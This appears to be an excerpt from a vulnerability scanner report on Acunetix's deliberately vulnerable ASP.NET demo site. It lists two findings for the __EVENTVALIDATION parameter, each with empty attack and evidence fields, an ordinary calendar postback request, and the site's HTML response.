Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1161 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,161 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8266&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgDAdcJ1gdoIZGRkWoxJqUfrQTB5nzMU83Sk5BzPyGA%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL8i6zwDQKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy%2FfoBQLcy%2FfoBQLcy%2BuPDQLcy%2BuPDQLcy5%2BiBgLcy5%2BiBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt%2FQ8CsdKt%2FQ8CsdLBkQcCsdLBkQcCsdK1%2BQUCsdK1%2BQUCsdKpnA0CsdKpnA0Civm7BQKK%2BbsFAor5r9gJAor5r9gJAor5w%2FwCAor5w%2FwCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s%2BAFAor5s%2BAFAor5p4cNAor5p4cNAor5m%2BwLAor5m%2BwLAor5j4MDAor5j4MDAr%2BT%2B8QJAr%2BT%2B8QJAr%2BT75sBAr%2BT75sBAr%2BTg74KAr%2BTg74KAr%2BTt9UDAr%2BTt9UDAr%2BTq%2BgMAr%2BTq%2BgMAr%2BT34wEAr%2BT34wEAr%2BT86MNAr%2BT86MNAr%2BT58YGAr%2BT58YGAr%2BT268DAr%2BT268DVjWBtUGn%2FH%2F4v8KvNgbNM0J7vHE%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:32:26 GMT Content-Length: 12565
Response Body - size: 12,565 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABsdQc9oIHgJTRBYBBgDAdcJ1gdoIZGRkWoxJqUfrQTB5nzMU83Sk5BzPyGA=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL8i6zwDQKcisLvAQLiidrKBQL7pJ3HDAL7pJ3HDAL7pPGsCQL7pPGsCQL7pOXDAgL7pOXDAgLcy/foBQLcy/foBQLcy+uPDQLcy+uPDQLcy5+iBgLcy5+iBgLcy7P5DwLcy7P5DwLcy6ecBwLcy6ecBwLcy9swAtzL2zAC3MvP1wkC3MvP1wkC3Mvj6gIC3Mvj6gIC3MvX0w8C3MvX0w8C3MvL9ggC3MvL9ggCsdLVnwoCsdLVnwoCsdLJsgMCsdLJsgMCsdL9yQwCsdL9yQwCsdKR7AUCsdKR7AUCsdKFgw0CsdKFgw0CsdK5pgYCsdK5pgYCsdKt/Q8CsdKt/Q8CsdLBkQcCsdLBkQcCsdK1+QUCsdK1+QUCsdKpnA0CsdKpnA0Civm7BQKK+bsFAor5r9gJAor5r9gJAor5w/wCAor5w/wCAor595MKAor595MKAor567YDAor567YDAor5n80MAor5n80MAor5s+AFAor5s+AFAor5p4cNAor5p4cNAor5m+wLAor5m+wLAor5j4MDAor5j4MDAr+T+8QJAr+T+8QJAr+T75sBAr+T75sBAr+Tg74KAr+Tg74KAr+Tt9UDAr+Tt9UDAr+Tq+gMAr+Tq+gMAr+T34wEAr+T34wEAr+T86MNAr+T86MNAr+T58YGAr+T58YGAr+T268DAr+T268DVjWBtUGn/H/4v8KvNgbNM0J7vHE=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">August 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8254')" style="color:Black" title="August 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8255')" style="color:Black" title="August 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8256')" style="color:Black" title="August 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8257')" style="color:Black" title="August 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8258')" style="color:Black" title="August 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8259')" style="color:Black" title="August 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8260')" style="color:Black" title="August 13">13</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8261')" style="color:Black" title="August 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8262')" style="color:Black" title="August 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8263')" style="color:Black" title="August 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8264')" style="color:Black" title="August 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8265')" style="color:Black" title="August 18">18</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8266')" style="color:White" title="August 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8267')" style="color:Black" title="August 20">20</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8268')" style="color:Black" title="August 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8269')" style="color:Black" title="August 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8270')" style="color:Black" title="August 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8271')" style="color:Black" title="August 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8272')" style="color:Black" title="August 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8273')" style="color:Black" title="August 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8274')" style="color:Black" title="August 27">27</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1169 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,169 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8352&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgBA%2FAEKxdoIZGRklRfK4b5l2%2BAFVC2KdKE5uXdfaeQ%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL8poT4BQLHkIz%2BDgL%2BkLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gIC%2B6T5jQoC%2B6T5jQoC%2B6TtoAMC%2B6TtoAMC%2B6SBxwwC%2B6SBxwwC%2B6T1rAkC%2B6T1rAkC%2B6TpwwIC%2B6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3%2BQ8C3Mu3%2BQ8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5%2BoCAtzL5%2BoCAtzL29MPAtzL29MPAtzLz%2FYIAtzLz%2FYIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm%2FBQKK%2BdPZCQKK%2BdPZCQKK%2Bcf8AgKK%2Bcf8AgKK%2BfuTCgKK%2BfuTCgKK%2Be%2B2AwKK%2Be%2B2AwKK%2BYPNDAKK%2BYPNDAKK%2BbfgBQKK%2BbfgBQKK%2BauHDQKK%2BauHDQKK%2BZ%2FsCwKK%2BZ%2FsCwKK%2BbODAwKK%2BbODA2Q4KFL8MO0i593VbFOOlTywM882
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:17:29 GMT Content-Length: 12617
Response Body - size: 12,617 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgBA/AEKxdoIZGRklRfK4b5l2+AFVC2KdKE5uXdfaeQ=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL8poT4BQLHkIz+DgL+kLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gIC+6T5jQoC+6T5jQoC+6TtoAMC+6TtoAMC+6SBxwwC+6SBxwwC+6T1rAkC+6T1rAkC+6TpwwIC+6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3+Q8C3Mu3+Q8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5+oCAtzL5+oCAtzL29MPAtzL29MPAtzLz/YIAtzLz/YIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODA2Q4KFL8MO0i593VbFOOlTywM882" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">November 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8345')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8346')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8347')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8348')" style="color:Black" title="November 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8349')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8350')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8351')" style="color:Black" title="November 12">12</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8352')" style="color:White" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8353')" style="color:Black" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8354')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8355')" style="color:Black" title="November 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8356')" style="color:Black" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8357')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8358')" style="color:Black" title="November 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8359')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8360')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8361')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8362')" style="color:Black" title="November 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8363')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8364')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8365')" style="color:Black" title="November 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> 